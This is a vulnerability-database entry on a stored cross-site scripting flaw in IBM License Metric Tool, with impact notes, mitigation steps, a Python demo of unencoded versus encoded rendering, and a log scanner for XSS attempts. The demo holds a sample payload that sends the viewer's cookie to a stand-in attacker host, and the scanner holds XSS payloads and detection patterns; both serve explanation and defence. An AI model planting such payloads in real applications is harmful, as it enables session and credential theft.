
CVE-2025-36352: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in IBM License Metric Tool

Medium
Tags: Vulnerability, CVE-2025-36352, cve, cwe-79
Published: Mon Sep 29 2025 (09/29/2025, 14:25:39 UTC)
Source: CVE Database V5
Vendor/Project: IBM
Product: License Metric Tool

Description

IBM License Metric Tool 9.2.0 through 9.2.40 is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

AI-Powered Analysis

Last updated: 09/29/2025, 14:31:45 UTC

Technical Analysis

CVE-2025-36352 is a stored cross-site scripting (XSS) vulnerability in IBM License Metric Tool versions 9.2.0 through 9.2.40. The root cause is improper neutralization of input during web page generation (CWE-79): a value that an authenticated user can save through the web UI is later written into a page without adequate output encoding, so the browser interprets it as markup and script rather than as data. Because the payload is stored server-side, it runs in the browser of every user who subsequently views the affected page, inside that user's session and the application's origin, where it can alter the page's behaviour, perform actions as the viewer, or exfiltrate what the session can read, including credentials. The attacker needs only an authenticated account to plant the payload; the victim does nothing beyond opening a page they would normally open, which is why the CVSS vector rates user interaction as not required.

The CVSS v3.1 base score is 6.4 (medium): network attack vector, low attack complexity, low privileges required (an authenticated user), no user interaction, and a changed scope, with impact on confidentiality and integrity but not on availability. The scope change reflects that the injected script executes in the viewer's browser rather than in the vulnerable component itself. No exploitation in the wild has been reported, and no patch was linked at the time of publication. IBM License Metric Tool tracks software licence usage and compliance across an estate, so a hijacked session could expose or tamper with licence inventory data and, if credentials are disclosed, serve as a foothold for further access within organisations that rely on the tool for licence governance.
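To make the CWE-79 mechanism concrete, here is an added example that is not IBM's code and not from the original page: a minimal Python model of a stored free-text field rendered once without encoding and once with HTML-context output encoding. The field store, the function names and the cookie-exfiltrating payload are all constructed for illustration, and an HTML parser stands in for the browser to count the constructs it would execute.

```python
import html
from html.parser import HTMLParser

# Hypothetical in-memory store for a free-text field that an authenticated
# user can save and that other users later see rendered in a table.
# Illustrative only; this is not IBM License Metric Tool code.
STORED_FIELDS = {}


def save_field(user, value):
    """Persist whatever the user submitted, as the vulnerable app would."""
    STORED_FIELDS[user] = value


def render_vulnerable(user):
    """CWE-79: the stored value is concatenated into HTML unencoded, so
    '<img onerror=...>' becomes live markup in every viewer's browser."""
    return f"<tr><td>{user}</td><td>{STORED_FIELDS[user]}</td></tr>"


def render_hardened(user):
    """Same page, with the stored value encoded for the HTML text context:
    '<' becomes '&lt;' and '"' becomes '&quot;', so the browser shows the
    payload as text instead of executing it."""
    return (
        f"<tr><td>{html.escape(user)}</td>"
        f"<td>{html.escape(STORED_FIELDS[user])}</td></tr>"
    )


class ScriptFinder(HTMLParser):
    """Stand-in for the browser: counts <script> elements and on* event
    handler attributes, the places where markup turns into code."""

    def __init__(self):
        super().__init__()
        self.executable = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.executable += 1
        self.executable += sum(1 for name, _ in attrs if name.lower().startswith("on"))


def executable_count(markup):
    """Number of script-bearing constructs a browser would find in markup."""
    finder = ScriptFinder()
    finder.feed(markup)
    finder.close()
    return finder.executable


# Constructed payload of the kind an authenticated attacker could store:
# it sends the viewer's cookie to an attacker-controlled host (hypothetical).
PAYLOAD = "<img src=x onerror=\"fetch('//attacker.invalid/?c='+document.cookie)\">"

if __name__ == "__main__":
    save_field("mallory", PAYLOAD)
    print("vulnerable:", executable_count(render_vulnerable("mallory")))  # 1
    print("hardened:  ", executable_count(render_hardened("mallory")))    # 0
```

Note that `html.escape` is the right encoder only for the HTML text and quoted-attribute contexts shown here; a value written into a JavaScript string, a URL, or CSS needs the encoder for that context, and a value rendered with `HttpOnly` cookies still lets the script act within the victim's session even though `document.cookie` is empty.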

Potential Impact

For European organizations, this vulnerability threatens the confidentiality and integrity of licence management data and, if credentials or sessions are captured, of the broader environment those credentials unlock. Because IBM License Metric Tool is commonly integrated into IT asset management and compliance workflows, tampering with or leaking its data could corrupt licence compliance reporting, with regulatory and financial consequences. A persistent script in the UI can harvest session tokens or credentials from every user who views the affected page, which can feed lateral movement or privilege escalation inside the network. Because the script runs in the tool's own origin and in the session of whoever opens the page, the victim sees nothing unusual and no phishing step is required. The risk is greater in sectors with strict compliance obligations such as finance, healthcare and government, all prevalent across Europe. Exploitation requires an authenticated account, so the realistic threat actors are insiders and attackers holding compromised credentials, which makes strong identity and access management controls the first line of defence.

Mitigation Recommendations

1. Restrict access to the IBM License Metric Tool web UI to trusted, necessary personnel and enforce strong authentication such as multi-factor authentication (MFA); exploitation requires an authenticated account, so reducing account compromise directly reduces exposure.
2. Strict input validation and context-aware output encoding of all user-supplied fields in the web UI is the root-cause fix, but it lives in the product's code and must come from IBM; operators cannot close the flaw through local configuration and should plan to apply the vendor's fixed release.
3. Monitor and audit user activity and application or web-server logs for unusual behaviour, in particular free-text fields submitted with HTML tags, event-handler attributes, `javascript:` URIs, or URL- and entity-encoded equivalents of these.
4. Segment the network so the License Metric Tool is isolated from critical systems, limiting lateral movement if an account or session is compromised.
5. Since no official patch is linked at the time of publication, engage IBM support for any available hotfix or workaround and apply it promptly once released.
6. Educate users about the risks of XSS and encourage them to report unexpected behaviour in the tool's web interface, such as prompts for credentials that the tool does not normally show.
7. Deploy web application firewall (WAF) rules tailored to detect and block XSS payloads targeting this application, treating them as a stopgap: encoding variants can bypass signature rules, so the WAF does not replace the vendor fix.
8. Track IBM's security bulletin for this CVE, upgrade as soon as a fixed version is available, and verify afterwards that the installed version is outside the 9.2.0 through 9.2.40 range.
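For items 3 and 7 above (log monitoring and WAF-style matching), here is an added example of detection logic that is not part of the original page and not an IBM artifact. It runs over a constructed request log whose line layout, field names and paths are hypothetical, normalises URL encoding (including double encoding) and HTML entities before matching, and reports which user, path and form field carried an XSS-looking value.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample of a web-server request log. The line layout, field
# names and paths are hypothetical; they are not the real IBM License Metric
# Tool log format. mallory's three POSTs carry a plain, a double-URL-encoded
# and an HTML-entity-encoded payload; alice and bob are benign.
SAMPLE_LOG = """\
2025-09-29T14:25:39Z user=alice method=POST path=/ui/computers/1/edit body=description=Laptop%20for%20finance%2C%20online%20since%20May
2025-09-29T14:26:02Z user=mallory method=POST path=/ui/computers/2/edit body=description=%3Cimg%20src%3Dx%20onerror%3D%22fetch(%27//attacker.invalid/%3Fc%3D%27%2Bdocument.cookie)%22%3E
2025-09-29T14:26:30Z user=mallory method=POST path=/ui/software/7/edit body=notes=%253Cscript%253Ealert(1)%253C%252Fscript%253E
2025-09-29T14:27:10Z user=mallory method=POST path=/ui/software/7/edit body=comment=%26lt%3Bsvg%20onload%3Dalert(1)%26gt%3B
2025-09-29T14:27:40Z user=bob method=GET path=/ui/dashboard body=
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) method=(?P<method>\S+) "
    r"path=(?P<path>\S+) body=(?P<body>\S*)$"
)

# Indicators of HTML/script injection. Deliberately narrow: a bare word such
# as "online" or "javascript" in ordinary prose must not fire.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "tag_with_handler": re.compile(
        r"<\s*(img|svg|iframe|object|embed|math|body|input)\b[^>]*\bon\w+\s*=", re.I),
    "event_handler": re.compile(r"\bon(error|load|mouseover|focus|click)\s*=", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
}


def normalize(value):
    """Undo the encodings an attacker can hide behind before matching:
    URL-decode twice (catches %253C for '<'), then decode HTML entities
    (catches &lt;script&gt; stored verbatim and unescaped at render time)."""
    return html.unescape(unquote(unquote(value)))


def scan_log(text):
    """Return one hit per submitted form field whose decoded value matches an
    indicator. Only POSTs are inspected, since that is how values get stored."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        for pair in m["body"].split("&"):
            field, _, raw = pair.partition("=")
            value = normalize(raw)
            rules = [name for name, rx in XSS_INDICATORS.items() if rx.search(value)]
            if rules:
                hits.append({"ts": m["ts"], "user": m["user"], "path": m["path"],
                             "field": field, "value": value, "rules": rules})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['user']} {h['path']} {h['field']}={h['value']!r} rules={h['rules']}")
```

The double URL decode and the entity decode are what catch the second and third of mallory's submissions; they also raise the false-positive rate on fields that legitimately hold encoded text, so tune the indicator list against your own traffic before alerting on it, and treat a hit as a trigger to inspect the stored value, not as proof of exploitation.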


Technical Details

Data Version
5.1
Assigner Short Name
ibm
Date Reserved
2025-04-15T21:16:54.209Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68da982a15f3c5a417dc16ac

Added to database: 9/29/2025, 2:31:06 PM

Last enriched: 9/29/2025, 2:31:45 PM

Last updated: 10/1/2025, 12:09:21 AM


